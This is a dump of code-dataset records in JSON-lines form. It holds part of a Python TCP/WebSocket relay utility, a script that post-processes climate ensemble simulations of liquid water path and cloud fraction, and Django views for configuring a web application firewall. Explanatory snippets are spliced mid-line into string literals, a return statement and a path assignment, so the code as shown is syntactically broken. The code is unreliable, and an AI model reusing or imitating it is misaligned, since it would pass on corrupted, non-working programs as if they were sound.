self.c.sendall(data)\n\n\nclass WsSocket(object):\n def __init__(self, addr):\n super(WsSocket, self).__init__()\n self.ip, self.port = addr\n if self.ip in ('', '*', '0'):\n self.ip = '0.0.0.0'\n self.c = None\n self.rq = Queue()\n self.tq = Queue()\n\n class MyWsApp(WebSocket):\n def handleConnected(self2):\n self.c = self2\n drain(self.tq, self)\n print('server on accept. 
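# --- The module docstring above specifies the TCP framing as
# "[4B as length][payload]". A self-contained pack/unpack sketch of that frame
# format (the big-endian byte order is an assumption here; the actual
# SimpleProtocolFilter imported above may differ in detail):
import struct

def pack(payload: bytes) -> bytes:
    return struct.pack(">I", len(payload)) + payload

def unpack_all(buf: bytes):
    # yield every complete payload found in buf
    while len(buf) >= 4:
        (n,) = struct.unpack(">I", buf[:4])
        if len(buf) < 4 + n:
            break                    # incomplete frame: wait for more bytes
        yield buf[4:4 + n]
        buf = buf[4 + n:]

stream = pack(b"hello") + pack(b"world")
assert list(unpack_all(stream)) == [b"hello", b"world"]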
{}'.format(self.c))\n\n def handleMessage(self2):\n print('received_message from {}: {}'.format(self2.address, self2.data))\n self.rq.put(self2.data)\n\n def handleClose(self2):\n self.c = None\n print('client gone. {}'.format(self2.address))\n\n self.server = SimpleWebSocketServer(self.ip, self.port, MyWsApp)\n self.t = threading.Thread(target=self.server.serveforever)\n self.t.daemon = True\n self.t.start()\n print('server listens on (\"{}\", {}) transport websocket'.format(self.ip, self.port))\n\n def update(self):\n time.sleep(0.001)\n return self.recv()\n\n def recv(self):\n try:\n return self.rq.get(False)\n except Empty:\n return None\n\n def send(self, data):\n if not self.c:\n self.tq.put(data)\n else:\n self.c.sendMessage(data)\n\n\nclass Repeater(object):\n def __init__(self, *eps):\n super(Repeater, self).__init__()\n self.eps = [urlparse(ep) for ep in eps]\n self.transports = [self._make_transport(ep) for ep in self.eps]\n self.t = threading.Thread(target=self.loop)\n self.t.daemon = True\n self.t.start()\n\n def _make_transport(self, ep):\n if ep.scheme.startswith('ws'):\n transport = WsSocket((ep.hostname, ep.port))\n else:\n transport = TcpSocket((ep.hostname, ep.port))\n return transport\n\n def loop(self):\n print('Repeater on.')\n while True:\n for t in self.transports:\n data = t.update()\n if not data:\n continue\n\n for t2 in self.transports:\n if t2 is t:\n continue\n t2.send(data)\n\n\n# raw tcp to tcp\ndef tcp2tcp(ep1, ep2):\n RX_SIZE = 65536\n\n ep1 = urlparse(ep1)\n ep2 = urlparse(ep2)\n\n s1 = socket.socket()\n s2 = socket.socket()\n s1.bind(('0.0.0.0', ep1.port))\n s2.bind(('0.0.0.0', ep2.port))\n s1.listen(1)\n s2.listen(1)\n\n c1 = None\n c2 = None\n q1 = [] # c1 -> q2\n q2 = [] # c2 -> q1\n\n print('proxy server started!')\n while True:\n rlist = [s1, s2]\n if c1 is not None:\n rlist.append(c1)\n if c2 is not None:\n rlist.append(c2)\n r, w, x = select.select(rlist, [], [])\n for c in r:\n if c is s1:\n c1, c1_addr = s1.accept()\n print('c1: accept from {}'.format(c1_addr))\n drain(q1, c1)\n elif c is s2:\n c2, c2_addr = s2.accept()\n print('c2: accept from {}'.format(c2_addr))\n drain(q2, c2)\n elif c is c1:\n rxdata = c.recv(RX_SIZE)\n if not rxdata:\n try:\n c1.close()\n except socket.error:\n pass\n c1 = None\n print('c1: disconnected')\n continue\n\n if c2 is not None:\n total_tx = drain(q2, c2)\n c2.sendall(rxdata)\n total_tx += len(rxdata)\n print('c1 -> c2: send data {:06d} B'.format(total_tx))\n else:\n q2.append(rxdata)\n print('c1 -> c2: queue data {:06d} B'.format(len(rxdata)))\n elif c is c2:\n rxdata = c.recv(RX_SIZE)\n if not rxdata:\n try:\n c2.close()\n except socket.error:\n pass\n c2 = None\n print('c2: disconnected')\n continue\n\n if c1 is not None:\n total_tx = drain(q1, c1)\n c1.sendall(rxdata)\n total_tx += len(rxdata)\n print('c2 -> c1: send data {:06d} B'.format(total_tx))\n else:\n q1.append(rxdata)\n print('c2 -> c1: queue data {:06d} B'.format(len(rxdata)))\n\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) < 3:\n print('Not enough arguments. Please provide at least 2 endpoints.')\n print('e.g. 
ws://*:15003 tcp://*:15004')\n exit(-1)\n rpt = Repeater(sys.argv[1], sys.argv[2])\n\n while True:\n time.sleep(5)\n","sub_path":"poco/utils/net/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"34079854","text":"#!/usr/bin/env python2.7 \n\nimport numpy as np\nimport csv\nimport ncplotlib as ncplt\nimport matplotlib.pyplot as plt\nimport xarray as xr\nfrom matplotlib import colors\nfrom collections import OrderedDict\n\n\nfrom matplotlib import rc\nrc('text', usetex=True)\nrc('font', **{'family': 'serif', 'serif': ['Computer Modern'], 'size': 10})\n\ndef ds_fix_dims(ds):\n ds = ds.rename({str(u'time_series_4500_1800.0'): 'time_coarse', str(u'time_series_75_60.0'): 'time_fine', str(u'time_series_75_1800.0'): 'time_mid'})\n ds['time_coarse']=ds.time_coarse/3600\n ds['time_mid']=ds.time_mid/3600\n ds['time_fine']=ds.time_fine/3600\n ds['x'] = ds.x.astype(float)/(35)\n ds['y'] = ds.y.astype(float)/(35)\n return ds\n\ndef surf_pre_calc(ds):\n '''\n surface precip domain mean in mm and summed over the simulation time\n '''\n surface_precip_mean = ds.surface_precip_mean*1000\n surface_precip_int = surface_precip_mean.sum()\n return surface_precip_int\n\ndef rwp_calc(ds):\n '''\n rwp domain mean in g m^(-2) and summed over the simulation time\n '''\n rwp_mean = ds.RWP_mean*1000\n rwp_int = rwp_mean.sum()\n return rwp_int\n\ndef rain(ds):\n rwp_int = rwp_calc(ds)\n sp_int = surf_pre_calc(ds)\n return [np.asscalar(rwp_int), np.asscalar(sp_int)]\n\ndef tke_calc(ds): \n tke_mean = ds.reske_mean + ds.subke_mean\n# u_squared_mean = np.mean(np.mean(np.mean(ds.u**2,axis=1),axis=1),axis=1)\n# v_squared_mean = np.mean(np.mean(np.mean(ds.v**2,axis=1),axis=1),axis=1)\n# w_squared_mean = np.mean(np.mean(np.mean(ds.w**2,axis=1),axis=1),axis=1)\n#\n# u_mean_squared = np.mean(np.mean(np.mean(ds.u,axis=1),axis=1),axis=1)**2\n# v_mean_squared = np.mean(np.mean(np.mean(ds.v,axis=1),axis=1),axis=1)**2\n# w_mean_squared = np.mean(np.mean(np.mean(ds.w,axis=1),axis=1),axis=1)**2\n#\n# u_prime_squared_mean = u_squared_mean-u_mean_squared\n# v_prime_squared_mean = v_squared_mean-v_mean_squared\n# w_prime_squared_mean = w_squared_mean-w_mean_squared\n#\t\n# tke_calc = u_prime_squared_mean + v_prime_squared_mean + w_prime_squared_mean \n time_mean = ds.reske_mean[ds.reske_mean.dims[0]].values\n time_calc = ds.u[ds.u.dims[0]].values\n return tke_mean, time_mean\n\ndef lwp_total(ds, hours):\n if include_spinup == True:\n lwp = ds.LWP_mean*1000\n else:\n lwp = ds.LWP_mean[fine_spin:]*1000\n hours -= 1\n \n lwp_last = lwp[last]\n lwp_mean = np.mean(lwp[-fine_ave:])\n lwp_tend = (lwp[last] - lwp[first])/hours\n lwp_teme = (np.mean(lwp[-fine_ave:]) - np.mean(lwp[:fine_ave]))/hours\n tendency = calc_tendency(lwp)\n return [lwp_last, lwp_mean, lwp_tend, lwp_teme], lwp.values, tendency, lwp[lwp.dims[0]].values\n\ndef lwp_smooth(ds, hours):\n '''\n Moving average of the lwp and tendency\n '''\n if include_spinup == True:\n lwp = ds.LWP_mean*1000\n else:\n lwp = ds.LWP_mean[fine_spin:]*1000\n hours-=1\n step = 55\n lwp_smooth = []\n lwp_tend = []\n lwp_tend_smooth = []\n i = 0\n for l in range(1, len(lwp)):\n lwp_tend.append((lwp[l] - lwp[l-1])/(lwp.time_fine[l] - lwp.time_fine[l-1]))\n if l>step-1:\n lwp_smooth.append(lwp[l-step:l].mean())\n if i>0:\n lwp_tend_smooth.append((lwp_smooth[i] - lwp_smooth[i-1])/(lwp.time_fine[l] - lwp.time_fine[l-1]))\n i+=1\n return [lwp_smooth[-1], np.mean(lwp_smooth[-55:]), 
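# --- lwp_smooth() above builds its 55-sample running mean with an explicit
# window loop; the same smoothing can be done in one vectorised call (a
# sketch, ignoring the simultaneous tendency bookkeeping of the full
# function):
import numpy as np

def running_mean(x, w=55):
    # mean over each length-w window, like averaging lwp[l-w:l] for l >= w
    return np.convolve(x, np.ones(w) / w, mode="valid")

print(running_mean(np.arange(10.0), 3))   # [1. 2. 3. 4. 5. 6. 7. 8.]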
lwp_tend[-1], np.mean(lwp_tend),\n\t (lwp_smooth[-1]-lwp_smooth[0])/hours]\n\n\ndef lwp_cloud_calc(lmmr, lwp): \n cloudy_lwp = []\n t = []\n #diff = lmmr[-1] - lmmr[0]\n for m in range(len(lmmr)):\n col_mask = layer_cloud_mask(lmmr, m)\n arr_mask = col_mask.values\n lwp_masked = lwp[m].where(arr_mask==1)\n if m==0:\n lwp_masked_first = lwp_masked*1000\n cloud_lwp_mean = lwp_masked.mean(axis=(0,1))\n cloudy_lwp.append(np.asscalar(cloud_lwp_mean.values)*1000)\n t.append(np.asscalar(lmmr[m][lmmr.dims[0]].values)/3600)\n\n lwp_masked = lwp_masked*1000\n lwp_last = lwp_masked.fillna(0)\n lwp_first = lwp_masked_first.fillna(0)\n lwp_diff = lwp_last - lwp_first\n return cloudy_lwp, t, lwp_masked, lwp_diff\n\ndef lwp_cloud(ds, hours):\n if include_spinup == True:\n lwp = ds.lwp\n lmmr = ds.q_cloud_liquid_mass\n else:\n lwp = ds.lwp[coarse_spin:]\n lmmr = ds.q_cloud_liquid_mass[coarse_spin:]\n hours -= 1\n \n cloudy_lwp, times, lwp_masked_last, lwp_diff = lwp_cloud_calc(lmmr, lwp)\n lwp_cloud_last = cloudy_lwp[last]\n lwp_cloud_mean = np.mean(cloudy_lwp[-coarse_ave:])\n lwp_cloud_tend = (cloudy_lwp[last]-cloudy_lwp[first])/hours\n lwp_cloud_teme = (np.mean(cloudy_lwp[-coarse_ave:])-np.mean(cloudy_lwp[:coarse_ave]))/hours\n tendency = calc_tendency(cloudy_lwp, times)\n return [lwp_cloud_last, lwp_cloud_mean, lwp_cloud_tend, lwp_cloud_teme],cloudy_lwp,tendency,times, lwp_masked_last, lwp_diff\n\ndef calc_tendency(dataarray, *times):\n tendency=[]\n if times:\n tseries = times[0]\n else:\n tseries = dataarray[dataarray.dims[0]].values/3600\n dataarray = dataarray.values\n for t_ind in range(1, len(dataarray), 1):\n c_step = dataarray[t_ind]\n p_step = dataarray[t_ind - 1]\n dx = (c_step) - (p_step)\n t = tseries[t_ind] - tseries[t_ind-1]\n if t != 0:\n tendency.append(dx/t)\n else:\n tendency.append(dx/0.01)\n return tendency\n\n\ndef column_cloud_fraction(lmmr):\n cloud_frac=[]\n t =[]\n for m in range(len(lmmr)):\n col_mask = layer_cloud_mask(lmmr, m)\n total = col_mask.sum(axis=(0,1))\n f = np.asscalar(total.values)/(250*250)\n cloud_frac.append(f)\n t.append(np.asscalar(lmmr[m][lmmr.dims[0]].values)/3600)\n return cloud_frac, t\n\ndef clfrac(ds, hours):\n if include_spinup == True:\n lmmr = ds.q_cloud_liquid_mass\n else:\n lmmr = ds.q_cloud_liquid_mass[coarse_spin:]\n hours -= 1\n\n \n cloud_frac, times = column_cloud_fraction(lmmr)\n cloud_frac_last = cloud_frac[last]\n cloud_frac_mean = np.mean(cloud_frac[-coarse_ave:])\n cloud_frac_tend = (cloud_frac[last] - cloud_frac[first])/hours\n cloud_frac_teme = (np.mean(cloud_frac[-coarse_ave:]) -\n\t np.mean(cloud_frac[:coarse_ave]))/hours\n tendency = calc_tendency(cloud_frac, times)\n return [cloud_frac_last, cloud_frac_mean, cloud_frac_tend, cloud_frac_teme], cloud_frac, tendency, times\n\ndef layer_cloud_mask(dataarray, time):\n '''\n Applies mask to each timestep and sums\n '''\n for n in range(110):\n layer = dataarray[time,:,:,n]\n dataarray[time,:,:,n] = layer.where(layer.values<1e-5,1).where(layer.values>1e-5,0)\n col_sum = dataarray[time].sum(axis=2,skipna=True)\n col_mask = col_sum.where(col_sum.values<1,1)\n return col_mask\n\ndef lwp_different(dataarray):\n '''\n extract last lwp\n extract first lwp\n take the difference\n find masked array\n '''\n diff = dataarray[-1] - dataarray[0]\n \n\nppe_path = 
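# --- calc_tendency() above is a first-difference quotient, d(value)/d(time).
# A vectorised sketch with the same zero-step guard (a dt of 0 is replaced by
# 0.01, exactly as in the loop):
import numpy as np

def tendency(values, times_hr):
    dv = np.diff(np.asarray(values, dtype=float))
    dt = np.diff(np.asarray(times_hr, dtype=float))
    dt[dt == 0] = 0.01
    return dv / dt

print(tendency([10.0, 12.0, 15.0], [0.0, 0.5, 1.5]))   # [4. 3.]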
\"/gws/nopw/j04/carisma/eers/dycoms_sim/PPE/ppe\"\noat_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/OAT/oat\"\nval_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/VAL/val\"\nextra_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/EXTRA/extra\"\nbase_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/BASE/base/base.nc\"\ndesign = np.loadtxt(\"/home/users/eers/designs/EmulatorInputsDesign2D.csv\",\n\tdelimiter=\",\", skiprows=1)\noat = np.array([[-7.5, 2], [-7.5, 20], [0, 8.5], [-9, 8.5]])\nvalidation = np.loadtxt(\"/home/users/eers/designs/ValidationInputsDesign2D.csv\", delimiter=\",\", skiprows=1)\nextra_design = np.loadtxt(\"/home/users/eers/designs/extra_points.csv\",delimiter=\",\")\nbase = np.array([[-7.5, 8.5]])\n\nppe_no = 20\noat_no = 4\nval_no = 8\nextra_no = 6\nbase_no = 1\n\nod = OrderedDict()\nod[\"ppe\"] = [ppe_no, ppe_path, design]\nod[\"oat\"] = [oat_no, oat_path, oat]\nod[\"val\"] = [val_no, val_path, validation]\nod[\"extra\"] = [extra_no, extra_path, extra_design]\nod[\"base\"] = [base_no, base_path, base]\n\n### Initialise np arrays ###\nlast = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nmean = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\ntend = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nteme = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nrwp = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nsurface_precip = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\n\nlwp_last = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_mean_lasthr = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_tend_last = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_tend_ave = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_tend_diff = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\n\n#ppe_clfrac = np.empty((ppe_no+val_no+base_no,12))\n#ppe_cltime = np.empty((ppe_no+val_no+base_no,12))\n\narrays = [last, mean, tend, teme]\nrain_arrays = [rwp, surface_precip]\ntesting_arrays = [lwp_last, lwp_mean_lasthr, lwp_tend_last, lwp_tend_ave, lwp_tend_diff]\n\na=0 #\n\n### Options ###\nfirst = 0\nlast = -1\ncoarse_spin = 1 # 1 hour = 1, 2 hours = 2\nfine_spin = 55 # 1 hour = 55, 2 hours = 111\ncoarse_ave = 3\nfine_ave = 111\n\n### Loop through PPE datasets ###\n#calc = 'rain'\ncalc = 'lwp_total'\n#calc = 'lwp_cloud'\n#calc = 'lwp_smooth'\n#calc = 'cloud_frac'\ni=0\nbelow_ppe=[5,6,11,12,14,18]\nbelow_val=[5,6,8]\nbelow_extra=[6] #[5,6]\nlines=[]\ninclude_spinup = True # See fine_spin and coarse_spin for setup\n\nlwp_scenes=[]\nlwp_ppe=[]\nscene_values = [] \n\nfor key in od:\n for j in range(od[key][0]):\n k = j+1\n nc = od[key][1] + str(k) + \"/\" + key + str(k) + \".nc\"\n if key=='base':\n \t nc = base_path \n ds = xr.open_dataset(nc)\n ds = ds_fix_dims(ds)\n \n if key == 'oat': ## for low nd\n hours = 7\n else:\n hours = 8\n #hours = 8 ## for high nd\n \n if calc == 'lwp_total':\n output_array, timeseries, tendency, times = lwp_total(ds, hours)\n \t #time_hrs = times[1:]\n time_hrs = times\n elif calc == 'lwp_cloud':\n output_array, timeseries, tendency, times, lwp_masked_last, lwp_diff = lwp_cloud(ds, hours)\n \t #time_hrs = times[1:]\n time_hrs = times\n #lwp_diff = lwp_diff.transpose() ## scene difference from start to end\n #np.savetxt(\"lwp_scenes_diff/lnd_lwp_scene_diff_%s%s.csv\"%(key,k),lwp_diff.values, delimiter=',')\n elif calc == 'lwp_smooth':\n output_array = lwp_smooth(ds, hours) \n elif calc == 'cloud_frac':\n \t output_array, timeseries, tendency, times = clfrac(ds, hours)\n \t #time_hrs = times[1:]\n \t time_hrs = 
times\n elif calc == 'rain':\n \t output_array = rain(ds)\n else:\n print('Select calc')\n break\n\n if calc in ['cloud_frac','lwp_cloud','lwp_total']:\n \t for b, array in enumerate(arrays):\n array[i, 0] = od[key][2][j][1]\n array[i, 1] = od[key][2][j][0]\n array[i, 2] = output_array[b]\n elif calc == 'rain':\n \t for b, array in enumerate(rain_arrays):\n \t array[i, 0] = od[key][2][j][1]\n \t array[i, 1] = od[key][2][j][0]\n \t array[i, 2] = output_array[b]\n elif calc == 'lwp_smooth':\n for b, array in enumerate(testing_arrays):\n array[i, 0] = od[key][2][j][1]\n array[i, 1] = od[key][2][j][0]\n array[i, 2] = output_array[b]\n\n if key=='ppe':\n lwp_ppe.append(timeseries)\n elif key=='base':\n base=timeseries\n\t### three quotes here\n np.savetxt('{}{}_timeseries.csv'.format(key,str(k)),timeseries,delimiter=',')\n np.savetxt('{}{}_times.csv'.format(key,str(k)),time_hrs,delimiter=',')\n ds.close()\n print(i)\n i+=1\n a+=1 #\n\t\n#ax.legend((lines[10],lines[7],lines[24],lines[20],lines[0],lines[11]), ('below line ppe', 'above line ppe', 'below line val', 'above line val','outlier','corrupt'), loc=\"upper left\", fontsize=10)\n#ax.legend((lines[6],lines[7],lines[24],lines[25]), ['below line ppe', 'above line ppe', 'below line val', 'above line val'], loc=\"upper left\", fontsize=10)\n'''\nif calc == 'rain':\n np.savetxt(\"dycoms_data_%s_rwp.csv\"%calc, rain_arrays[0], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_surfpre.csv\"%calc, rain_arrays[1], delimiter=\",\")\nelif calc == 'lwp_smooth':\n np.savetxt(\"dycoms_data_%s_lwp_last.csv\"%calc, testing_arrays[0], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_mean_lasthr.csv\"%calc, testing_arrays[1], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_tend_last.csv\"%calc, testing_arrays[2], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_tend_ave.csv\"%calc, testing_arrays[3], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_tend_diff.csv\"%calc, testing_arrays[4], delimiter=\",\")\nelse:\n np.savetxt(\"dycoms_data_%s_last.csv\"%calc, arrays[0], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_mean.csv\"%calc, arrays[1], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_tend.csv\"%calc, arrays[2], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_teme.csv\"%calc, arrays[3], delimiter=\",\")\n#np.savetxt(\"ppe_lwp_timeseries.csv\", lwp_ppe, fmt='%s', delimiter=',')\n'''\n### Variability ###\n\nvar_path = \"/gws/nopw/j04/carisma/eers/dycoms_sim/INT_VAR/\"\npoints = {\"thick\":\"Highest LWP\",\"kparam\":\"On $\\kappa$ line\", \"thin\":\"Lowest LWP\"}\n\n### Create lists ###\ne_last=[]\ne_mean=[]\ne_tend=[]\ne_teme=[]\nlines=[]\ni=0\n\nfor point in points:\n if point=='kparam':\n colour = (238/255, 27/255, 155/255)\n elif point=='thick':\n colour = (255/255, 211/255, 29/255)\n elif point=='thin':\n colour = (26/255, 224/255, 203/255)\n\n for i in range(5):\n name = point + str(i+1)\n nc = var_path + point + \"/\" + name + \"/\" + name + \".nc\" \n ds = xr.open_dataset(nc)\n\n hours = 8\n\n if calc == 'lwp_total':\n output_array, timeseries, tendency, times = lwp_total(ds, hours)\n time_hrs = times/3600\n elif calc == 'lwp_cloud':\n output_array, timeseries, tendency, times,lwp_masked = lwp_cloud(ds, hours)\n time_hrs = times\n np.savetxt(\"lwp_scenes_values_intvar_%s.csv\"%(name), lwp_masked.values, delimiter=',')\n elif calc == 'cloud_frac':\n output_array, timeseries, tendency, times = clfrac(ds, hours)\n time_hrs = times\n else:\n print(\"Select calc\")\n break\n\n np.savetxt('{}{}_timeseries.csv'.format(point,str(i+1)), 
timeseries,delimiter=',')\n np.savetxt('{}{}_times.csv'.format(point,str(i+1)),time_hrs,delimiter=',')\n\n e_last.append(output_array[0])\n e_mean.append(output_array[1])\n e_tend.append(output_array[2])\n e_teme.append(output_array[3])\n print(point + ' finished') \n\noutput_type=e_mean\n#thick_mean = \"{:.2f}\".format(np.mean(output_type[0:4]))\n#kparam_mean = \"{:.2f}\".format(np.mean(output_type[5:9]))\n#thin_mean = \"{:.2f}\".format(np.mean(output_type[10:14]))\n#thick_var = \"{:.2f}\".format(np.var(output_type[0:4]))\n#kparam_var = \"{:.2f}\".format(np.var(output_type[5:9]))\n#thin_var =\"{:.2f}\".format(np.var(output_type[10:14]))\n#labels = \"%s, $\\mu = %s,\\; \\sigma^{2} = %s$\"\n\n#np.savetxt('ensemble_%s.csv'%calc, [e_last, e_mean, e_tend, e_teme], delimiter=',')\n","sub_path":"ppe_postproc.py","file_name":"ppe_postproc.py","file_ext":"py","file_size_in_byte":15320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"620342027","text":"\nimport os\nimport xlwt\nimport datetime\nfrom urllib.parse import unquote, urlparse\n\nfrom django.conf import settings\nfrom django.http import StreamingHttpResponse\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom common.decorators import rights_required\nfrom common.feed import (AccountsFeed as af, OperateMsg as om, APIUrl,\n DEFAULT_RULE_CONF, WAF_ATTACK_TYPE)\nfrom common.country_conf import COUNTRY_NAME_CONF, COUNTRY_ABBREVIATION_CONF\nfrom common.functions import (json_response, int_check, data_pagination,\n make_error_file, timestamp_to_str, str_to_datetime,\n datetime_to_str)\n\nfrom base.models import UserProfile, Domain, OperateLog\nfrom security.ajax.base_ajax import (user_get_waf_default_rule,\n user_get_waf_self_rule,\n user_reset_default_rule,\n user_enable_default_rule,\n user_enable_self_rule,\n user_get_log_list, user_download_log,\n user_get_log_detail,\n user_get_waf_statistics,\n user_download_time_cnt,\n user_download_ip_list,\n user_download_rule_list)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_sec_domain_list(request):\n\n msg = ''\n status = False\n\n res = {\n 'status': status,\n 'msg': msg\n }\n\n url = request.POST.get('domain', '')\n\n url_info = urlparse(url)\n protocol = url_info.scheme\n netloc = url_info.netloc\n path = url_info.path\n\n try:\n user = request.user\n\n domain_query = Domain.objects.filter(user=user)\n\n if url:\n if protocol and netloc:\n domain_query = domain_query.filter(\n protocol=protocol, domain=netloc)\n else:\n domain_query = domain_query.filter(domain__contains=path)\n\n domain_name_list = [i.domain for i in domain_query]\n\n body = {\n 'domain_list': domain_name_list\n }\n\n api_res = APIUrl.post_link('domain_query', body)\n api_domain_query = api_res.get('domain_query', [])\n\n domain_dict_list = []\n for domain_obj in domain_query:\n\n url = '%s://%s' % (domain_obj.protocol, domain_obj.domain)\n\n if url not in api_domain_query:\n continue\n\n domain_info = api_domain_query.get(url, {})\n\n user_id = domain_info.get('user_id')\n user = UserProfile.objects.filter(id=user_id).first()\n\n # waf标记\n is_waf = 0\n waf_info = domain_info.get('waf', [])\n if waf_info:\n is_waf = 1\n\n domain_dict = {\n 'username': user.username,\n 'WAF': is_waf,\n 'domain_id': domain_obj.id,\n 'channel_name': url\n }\n if is_waf:\n #---get domain status info.\n '''\n 0:显示“开通waf”\n 1:显示“待审核”\n 2:显示“审核不通过”\n 3:显示“配置”+“统计”\n '''\n status_from_api = 
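# Aside on the URL handling in parent_get_sec_domain_list above: it relies on
# urllib.parse.urlparse to split a submitted URL. Self-contained illustration:
from urllib.parse import urlparse

parts = urlparse('https://shop.example.com/search')
assert parts.scheme == 'https'
assert parts.netloc == 'shop.example.com'
assert parts.path == '/search'
# A bare domain such as 'example.com' has no scheme, so urlparse places it in
# .path -- which is why the view falls back to domain__contains=path.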
APIUrl.post_link('get_domain_status', {'channel': url})\n if status_from_api['return_code'] == 0:\n channel_status = status_from_api['data'].get('status', 0)\n domain_dict['WAF'] = channel_status\n else:\n print(f'parent_get_sec_domain_list[get_domain_status api error.] channel: {url}')\n\n domain_dict_list.append(domain_dict)\n\n check_msg, domain_dict_list, pagination = data_pagination(\n request, domain_dict_list)\n\n if check_msg:\n res['msg'] = _(check_msg)\n return json_response(res)\n\n res['domain_list'] = domain_dict_list\n res['page_info'] = pagination\n\n status = True\n\n except Exception as e:\n res['msg'] = e\n\n res['status'] = status\n\n return json_response(res)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_waf_base_conf(request):\n \"\"\"父账号获取waf基本配置\"\"\"\n\n msg = ''\n status = False\n\n res = {\n 'status': status,\n 'msg': msg\n }\n\n provider = 'QINGSONG'\n\n domain_id = request.POST.get('domain_id', '')\n\n try:\n if not domain_id:\n msg = af.DOMAIN_NOT_EXIST\n assert False\n\n domain_obj = Domain.objects.filter(id=domain_id).first()\n if not domain_obj:\n msg = af.DOMAIN_NOT_EXIST\n assert False\n\n body = {\n 'channel': '%s://%s' % (domain_obj.protocol, domain_obj.domain),\n }\n api_res = APIUrl.post_link('get_waf_base_info', body)\n\n if api_res[provider]['return_code'] == 0:\n api_res = api_res[provider]\n try:\n default_waf_mode = int(api_res.get('default_waf_mode', 0))\n except Exception as e:\n print(e)\n default_waf_mode = 0\n\n try:\n self_waf_mode = int(api_res.get('self_waf_mode', 0))\n except Exception as e:\n print(e)\n self_waf_mode = 0\n\n base_conf = {\n 'is_https': int(api_res.get('is_https', False)),\n 'default_waf_mode': default_waf_mode,\n 'self_waf_mode': self_waf_mode\n }\n\n res['base_conf'] = base_conf\n\n status = True\n\n except AssertionError:\n res['msg'] = _(msg)\n\n res['status'] = status\n\n return json_response(res)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_set_defense_mode(request):\n \"\"\"父账号自己设置规则防御模式\"\"\"\n msg = ''\n status = False\n\n res = {\n 'status': status,\n 'msg': msg\n }\n\n provider = 'QINGSONG'\n\n domain_id = request.POST.get('domain_id', '')\n\n default_waf_mode = request.POST.get('default_waf_mode', '')\n self_waf_mode = request.POST.get('self_waf_mode', '')\n\n try:\n domain_obj = Domain.objects.filter(id=domain_id).first()\n if not domain_obj:\n msg = af.DOMAIN_NOT_EXIST\n assert False\n\n body = {\n 'channel': '%s://%s' % (domain_obj.protocol, domain_obj.domain),\n }\n\n if default_waf_mode:\n default_waf_mode = int_check(default_waf_mode)\n if default_waf_mode is None:\n msg = af.PARAME_ERROR\n assert False\n\n body['default'] = 1\n body['switch'] = default_waf_mode\n log_msg = om.SET_DEFAULT_RULE_MODE % (\n request.user.username, domain_obj.domain, default_waf_mode)\n\n elif self_waf_mode:\n self_waf_mode = int_check(self_waf_mode)\n if self_waf_mode is None:\n msg = af.PARAME_ERROR\n assert False\n\n body['default'] = 0\n body['switch'] = self_waf_mode\n\n log_msg = om.SET_SELF_RULE_MODE % (\n request.user.username, domain_obj.domain, self_waf_mode)\n\n api_res = APIUrl.post_link('set_defense_mode', body)\n if api_res[provider]['return_code'] == 0:\n status = True\n\n OperateLog.write_operate_log(request, om.SECURITY, log_msg)\n\n except AssertionError:\n res['msg'] = _(msg)\n\n res['status'] = status\n\n return json_response(res)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef 
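# Two observations on parent_set_defense_mode above. First, log_msg is only
# bound inside the two mode branches, so a request supplying neither
# default_waf_mode nor self_waf_mode would reach the write_operate_log call
# with log_msg undefined. Second, the return_code check recurs across views;
# a small guard could centralise it. Sketch only -- api_ok is an invented name:
def api_ok(api_res, provider='QINGSONG'):
    """Return the provider payload when the upstream call succeeded, else None."""
    payload = api_res.get(provider, {})
    return payload if payload.get('return_code') == 0 else None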
parent_get_waf_default_rule(request):\n \"\"\"父账号获取默认规则\"\"\"\n return user_get_waf_default_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_waf_self_rule(request):\n \"\"\"父账号获取自定义规则\"\"\"\n return user_get_waf_self_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_reset_default_rule(request):\n \"\"\"父账号自己设置全部默认规则开关\"\"\"\n return user_reset_default_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_enable_default_rule(request):\n \"\"\"父账号自己设置默认规则\"\"\"\n return user_enable_default_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_enable_self_rule(request):\n \"\"\"父账号自己设置自定义规则\"\"\"\n return user_enable_self_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_log_list(request):\n \"\"\"父账号自己查看日志\"\"\"\n return user_get_log_list(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_log_detail(request):\n 